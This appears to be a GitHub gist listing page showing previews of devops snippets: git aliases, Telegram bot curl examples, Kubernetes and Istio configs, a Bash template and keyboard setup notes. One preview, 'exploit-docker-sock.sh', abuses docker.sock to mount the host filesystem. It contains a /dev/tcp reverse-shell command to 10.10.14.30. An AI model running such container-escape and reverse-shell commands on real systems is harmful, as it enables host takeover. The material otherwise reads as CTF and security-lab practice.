Skip to content

Instantly share code, notes, and snippets.

View fl64's full-sized avatar
🧬

Pavel Tishkov fl64

🧬
42 followers · 210 following
View GitHub Profile
@fl64
fl64 / .gitconfig
Last active June 20, 2024 06:51
bookmarks and snippets
[url "https://oauth2:{{ token }}@gitlab.xxx.ru/"]
insteadOf = https://gitlab.xxx.ru/
[core]
excludesfile = ~/.gitignore
attributesfile = ~/.gitattributes
[alias]
lg = log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit
lg1 = log --graph --abbrev-commit --decorate --format=format:'%C(bold blue)%h%C(reset) - %C(bold green)(%ar)%C(reset) %C(white)%s%C(reset) %C(dim white)- %an%C(reset)%C(bold yellow)%d%C(reset)' --all
lg2 = log --graph --abbrev-commit --decorate --format=format:'%C(bold blue)%h%C(reset) - %C(bold cyan)%aD%C(reset) %C(bold green)(%ar)%C(reset)%C(bold yellow)%d%C(reset)%n'' %C(white)%s%C(reset) %C(dim white)- %an%C(reset)' --all
lg3 = log --graph --all --date=relative --pretty=format:'%Cred%h %Creset%<|(100,trunc)%s %C(bold blue)<%an>%Creset %Cgreen(%cd)%Creset%C(auto)%d'
@SanariSan
SanariSan / readme.md
Last active June 29, 2024 16:29
Telegram HTTP bot API via CURL | Send text, photos, documents, etc.

Here are some examples on how to use Telegram bot api via CURL

Prerequisites

For getting messages in private chat with bot

  • Create a bot using @BotFather, get it's token
  • Start conversation with bot
  • Run following curl command
curl https://api.telegram.org/bot/getUpdates | grep -Po '"from":{"id":.+?,'
@protosam
protosam / audit - dind rootless.md
Created July 7, 2021 03:59

Docker in Docker (rootless) - Audit

This is just a quick test to see if we can jailbreak rootless Docker-in-Docker.

The pod we're using has 2 containers, one that runs the daemon, and one that keeps the user separated from the privileged pod completely.

We have created deploy.yaml and we have dind-rootless running.

$ kubectl get pods
NAME                             READY   STATUS    RESTARTS   AGE
dind-rootless-5ddddf649b-sk9bv   2/2     Running   0          106s
@deefdragon
deefdragon / migrate.configmap.yaml
Last active May 5, 2024 09:33
Migrating Kubernetes PVC/PVs from one storage class to another
apiVersion: v1
kind: ConfigMap
metadata:
# any name can be used; Velero uses the labels (below)
# to identify it rather than the name
name: change-storage-class-config
# must be in the velero namespace
namespace: velero
# the below labels should be used verbatim in your
# ConfigMap.
@PatrLind
PatrLind / protect-kube-config.md
Created April 26, 2021 08:43
How to protect your ~/.kube/ configuration

How to protect your ~/.kube/ configuration

I had a need to protect my Kubernetes config file on my computer against accidental or malicious change or reading, so I came up with this way of protecting the config files.

How it works

The ~/.kube folder is mounted using encfs. By using the --ondemand flag it will automatically ask for the encryption key/password when accessed and keep

@fl64
fl64 / main.go
Created December 24, 2020 07:18
golang prometheus exporter example
package main
import (
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promhttp"
"log"
"math/rand"
"net/http"
"time"
@m-radzikowski
m-radzikowski / script-template.sh
Last active June 25, 2024 12:02
Minimal safe Bash script template - see the article with full description: https://betterdev.blog/minimal-safe-bash-script-template/
#!/usr/bin/env bash
set -Eeuo pipefail
trap cleanup SIGINT SIGTERM ERR EXIT
script_dir=$(cd "$(dirname "${BASH_SOURCE[0]}")" &>/dev/null && pwd -P)
usage() {
cat <<EOF
Usage: $(basename "${BASH_SOURCE[0]}") [-h] [-v] [-f] -p param_value arg1 [arg2...]
@PwnPeter
PwnPeter / exploit-docker-sock.sh
Created December 6, 2020 16:30
Exploit docker.sock to mount root filesystem in a container
#!/bin/bash
# you can see images availables with
# curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
# here we have sandbox:latest
# command executed when container is started
# change dir to tmp where the root fs is mount and execute reverse shell
cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.30/12348 0<&1'\\\"\"]"
@andrebrait
andrebrait / keychron_linux.md
Last active June 26, 2024 03:35
Keychron keyboards on Linux + Bluetooth fixes

Here is the best setup (I think so :D) for K-series Keychron keyboards on Linux.

Note: many newer Keychron keyboards use QMK as firmware and most tips here do not apply to them. Maybe the ones related to Bluetooth can be useful, but everything related to Apple's keyboard module (hid_apple) on Linux, won't work. As far as I know, all QMK-based boards use the hid_generic module instead. Examples of QMK-based boards are: Q, Q-Pro, V, K-Pro, etc.

Most of these commands have been tested on Ubuntu 20.04 and should also work on most Debian-based distributions. If a command happens not to work for you, take a look in the comment section.

Make Fn + F-keys work (NOT FOR QMK-BASED BOARDS)

Older Keychron keyboards (those not based on QMK) use the hid_apple driver on Linux, even in the Windows/Android mode, both in Bluetooth and Wired modes.

@Jagdeep1
Jagdeep1 / istio.multiple-ingress.yaml
Created August 9, 2020 16:47
Istio configuration to setup multiple ingress gateways
apiVersion: install.istio.io/v1alpha1
kind: IstioOperator
metadata:
namespace: istio-system
name: multiple-ingress-istiocontrolplane
spec:
profile: default
values:
security:
selfSigned: false